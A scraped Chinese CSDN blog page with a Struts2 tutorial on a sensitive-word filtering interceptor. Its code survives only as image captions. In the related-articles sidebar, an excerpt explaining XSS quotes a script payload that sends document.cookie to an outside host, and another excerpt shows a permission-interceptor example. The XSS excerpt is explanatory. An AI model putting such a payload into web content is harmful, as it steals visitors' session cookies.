Struts中拦截器过滤敏感字符

最新推荐文章于 2020-12-12 08:35:47 发布
最新推荐文章于 2020-12-12 08:35:47 发布
阅读量747 收藏
点赞数
分类专栏: struts
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wylfll/article/details/48681205
版权

struts2 的文字过滤拦截器

struts2,拦截器,过滤,学习,文字0

1.新建一个news.jsp页面

struts2,拦截器,过滤,学习,文字1

struts2,拦截器,过滤,学习,文字2

然后,新建一个newsSuccess.jsp页面,

struts2,拦截器,过滤,学习,文字3

2.新建一个class,名为:TextAction.java

struts2,拦截器,过滤,学习,文字4

struts2,拦截器,过滤,学习,文字5

3.修改struts.xml的配置:

struts2,拦截器,过滤,学习,文字6

然后就可以初步传递数据了.
加上下面这句代码就可以防止传递中文字符时发生乱码现象:

struts2,拦截器,过滤,学习,文字7

4.下面创建拦截器,新建一个class,名为TextInterceptor.java

struts2,拦截器,过滤,学习,文字8

注意,新建的时候需要继承AbstractInterceptor.

然后,在struts.xml修改一下配置:

struts2,拦截器,过滤,学习,文字9

在action上面增加

struts2,拦截器,过滤,学习,文字10

OK~!  拦截器初步完成,运行试试:

struts2,拦截器,过滤,学习,文字11struts2,拦截器,过滤,学习,文字12



可能感兴趣


wylfll
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网站常用攻击技术详解
码上代码的博客
05-26 2万+
一、跨站脚本攻击 二、跨站请求伪造 三、SQL 注入攻击 四、拒绝服务攻击 参考资料 一、跨站脚本攻击 概念 跨站脚本攻击(Cross-Site Scripting, XSS),可以将代码注入到用户浏览的网页上,这种代码包括 HTML 和 JavaScript。 攻击原理 例如有一个论坛网站,攻击者可以在上面发布以下内容: <script>location.href="//domain.com/?c=" + document.cookie</script> 之后该内容可能会..
跨站脚本漏洞
weixin_46729085的博客
09-08 3714
XSS漏洞 一、文章简介 XSS漏洞是Web应用程序最常见的漏洞之一。如果您的站点没有预防XSS漏洞的固定方法,那么很可能就存在XSS漏洞。 这篇文章将带你通过代码层面去理解三个问题: 什么是XSS漏洞? XSS漏洞有哪些分类? 如何防范XSS漏洞? 二:三大分类 反射型XSS:<非持久化> 攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器没有这样的页面和内容),一般容易出现在搜索页面。 存储型XSS:&...
Struts2编写自定义验证拦截敏感词汇(十二)
两个蝴蝶飞
04-20 302
> 勿以恶小而为之,勿以善小而不为--------------------------刘备 > > 劝诸君,多行善事积福报,莫作恶 主要内容: 拦截敏感词汇,自定义验证器
struts防止xss攻击_Web常见攻击手段(二)
weixin_39784774的博客
12-12 174
人一生当,最重要的是,清楚自己想要什么,明白自己能做什么。千万不要等到生命终结的时候,才后悔没有得到想要的,没有去做能做的,从而虚度了人生。上篇文章介绍了几个Web常见攻击手段:防盗链、CSRF攻击还有安全漏洞像文件上传漏洞、密码漏洞等,这篇文章我们介绍一下:XSS攻击和sql注入。XSS攻击什么是XSS攻击?XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令...
【Bug】Struts2 利用Filter过滤特殊字符无效
不务正业的野猴子
04-23 888
临时抽调过来帮另一个项目组做特殊字符过滤,首先想到的方案是Filter+HttpServletRequestWrapper,现成的代码都有直接迁移过来就可以。结果却是只有部分参数获取时进行了转换,而大多数并没有经过转换。 项目是Struts2 的项目,字符过滤的核心逻辑如下: public String[] getParameterValues(String parameter) { St...
浅析JAVA过滤器、监听器、拦截器的区别
01-20
1.过滤器:所谓过滤器顾名思义是用来过滤的,在java web,你传入的request,response提前过滤掉一些信息,或者提前设置一些参数,然后再传入servlet或者struts的action进行业务逻辑,比如过滤掉非法url(不是login....
FilterAndInterceptor
08-20
本资源是包含过滤器、拦截器的一个完整的MyEclipse项目。下载后可以直接导入MyEclipse部署运行。 关于过滤器和拦截器过滤器--是在java web,提前过滤掉一些信息或者提前设置一些参数,然后再传入servlet/...
ssh(Struts2.0) 整合小项目,供想自己搭建框架的哥们借鉴
12-14
使用struts2+spring+hiernate开发的小项目,供想自己搭建环境的兄弟们借鉴,使用了拦截器过滤器做权限验证和字符集设置。以及spring配置hibernate数据源。数据库方面大家根据hibernate文件和数据源配置自己建立。
ssh(Struts2.0) 整合小项目,供想自己ssh搭建框架的兄弟借鉴
12-14
使用struts2+spring+hiernate开发的小项目,供想自己搭建环境的兄弟们借鉴,使用了拦截器过滤器做权限验证和字符集设置。以及spring配置hibernate数据源。数据库方面大家根据hibernate文件和数据源配置自己建立。 ...
spring2.5 struts2.0 hibernate3.2.5 搭建的企业级开发基础模块
10-22
还有登录拦截器:com.light.framework.interceptor 字符过滤器:com.light.framework.filter 项目字符集请用UTF-8 com.light.framework包还有些小东西 自己看看吧 我是用MyEclipse6.0开发的(MyEclipse...
struts2拦截器实现拦截不文明字迹
03-05
使用struts拦截器拦截一些敏感性的词或一些非法或不文秘的言论
struts2拦截器拦截器的方法过滤
下半夜的风
07-08 622
以前我们写的拦截器继承AbstractInterceptor类,可能会拦截整个Action的所有方法而无法控制。而在实际开发,很多时候我们只希望那个拦截器拦截某一个或者某几个请求,这样就导致了有些方法本来不用拦截,而拦截器将其拦截造成麻烦。所以这里编写自定义拦截器时就可以继承MethodFilterInterceptor类,这样就可以选择某些方法进行拦截,而不会拦截一个Action里面所有的方
关于struts2字符过滤器有趣的代码,过滤器有问题的童靴可以戳进来看看
stan451219097的专栏
06-07 133
以下是struts2的拦截器 字符过滤(网上代码有很多,都和这个差不多(我亲测以后发现字符过滤还是不行,就自己弄了一个)): [align=center][size=small][color=red]有一个最简单的方法就是在你的struts.xml文件添加: /* * To change this template, choose Tools | Templates ...
Struts过滤过滤某些字符
徐刘根的博客
09-24 3194
(1)天朝的规矩做项目的时候可能需要过滤某些特定的字符,在更多的用途是安全的考虑,下边就是一个过滤字符的简单案例; (2)过滤器代码如下: package com.lc.filter; import java.io.IOException; import javax.servlet.Filter; import javax.servlet.FilterChain; import j
ssh框架学习-struts2 使用自定义拦截器进行文字过滤拦截
Shawn_ling的博客
07-12 3279
自定义拦截器:一些与系统逻辑相关的通用功能,需要通过自定义拦截器来实现(权限的限制,用户输入内容的限制) 1.新建项目,在项目导入如下的jar包 2. 在web.xml文件配置struts2的核心控制器,用来拦截客户请求,把请求转发给相应的Action类来处理 <web-app version="2.5" xmlns="http://java.sun.com/xml/ns/ja
struts2学习之登陆拦截器和非法字符拦截器(六)
newbeedaly的博客
05-19 688
struts2拦截器
struts2拦截非法字符+防止反复提交
yyw14叶筱薇17的博客
04-26 1352
拦截 : 在src下建interceptor public class filterinterceptor extends AbstractInterceptor { /** *  */ private static final long serialVersionUID = 1L; @Override public String intercept(ActionI
struts2拦截器转化敏感字符
Javacghv的博客
07-29 1127
使用ajax局部刷新显示struts2拦截器转化敏感字符结果
struts2权限拦截器
最新发布
05-31
Struts2 ,可以使用拦截器来实现权限控制。具体来说,可以编写一个自定义的拦截器,然后在 struts.xml 配置文件将其配置为需要进行权限控制的 Action 的拦截器。以下是一个简单的权限拦截器示例: ```java public class AuthInterceptor extends AbstractInterceptor { @Override public String intercept(ActionInvocation invocation) throws Exception { // 获取当前用户 User user = (User) ActionContext.getContext().getSession().get("user"); // 判断用户是否拥有权限 if (user != null && user.hasPermission(invocation.getInvocationContext().getName())) { // 如果有权限,则继续执行 Action return invocation.invoke(); } else { // 如果没有权限,则跳转到错误页面 return "error"; } } } ``` 在上述代码,我们首先获取了当前用户,然后判断用户是否拥有执行当前 Action 的权限。如果有权限,则继续执行 Action;否则,跳转到错误页面。 接下来,在 struts.xml 配置文件,我们可以将该拦截器配置为需要进行权限控制的 Action 的拦截器,如下所示: ```xml <action name="myAction" class="com.example.MyAction"> <interceptor-ref name="authInterceptor"/> <result name="success">/myAction.jsp</result> <result name="error">/error.jsp</result> </action> <interceptor-stack name="authStack"> <interceptor-ref name="authInterceptor"/> <interceptor-ref name="defaultStack"/> </interceptor-stack> <interceptors> <interceptor name="authInterceptor" class="com.example.AuthInterceptor"/> </interceptors> ``` 在上述代码,我们首先定义了一个名为 authStack 的拦截器栈,该拦截器栈包含了 authInterceptor 和 defaultStack 两个拦截器。然后,我们将 myAction Action 配置为使用 authStack 拦截器栈。最后,我们定义了一个名为 authInterceptor 的拦截器,并将其添加到了 interceptors 。 这样一来,当用户访问 myAction Action 时,就会先执行 authInterceptor 拦截器,进行权限控制,然后再执行 defaultStack 拦截器的其它拦截器。如果 authInterceptor 拦截器返回了 error,则会跳转到 error.jsp 页面;否则,会跳转到 myAction.jsp 页面。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值